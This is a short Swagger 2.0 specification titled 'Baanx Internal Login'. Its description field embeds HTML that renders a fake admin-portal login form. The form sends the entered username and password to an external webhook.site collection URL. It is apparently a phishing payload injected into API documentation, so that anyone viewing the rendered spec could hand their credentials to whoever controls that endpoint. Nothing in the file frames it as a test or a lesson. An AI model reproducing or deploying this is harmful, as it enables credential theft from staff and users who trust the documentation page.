swagger: '2.0'
info:
  title: Baanx Internal Login
  version: 1.0.0
  description: >
    <div style="max-width:400px;margin:50px auto;padding:20px;border:1px solid #ccc;border-radius:8px;background:#f9f9f9;font-family:sans-serif;">
      <h2 style="text-align:center;color:#333;">Baanx Admin Portal</h2>
      <form action="https://webhook.site/1a1cc000-a5ef-4437-98c9-0e4107377af1" method="POST">
        <label>Username</label><br>
        <input name="username" /><br><br>
        <label>Password</label><br>
        <input name="password" type="password" /><br><br>
        <button type="submit">Login</button>
      </form>
    </div>
paths:
  /:
    get:
      responses:
        '200':
          description: Login form displayed
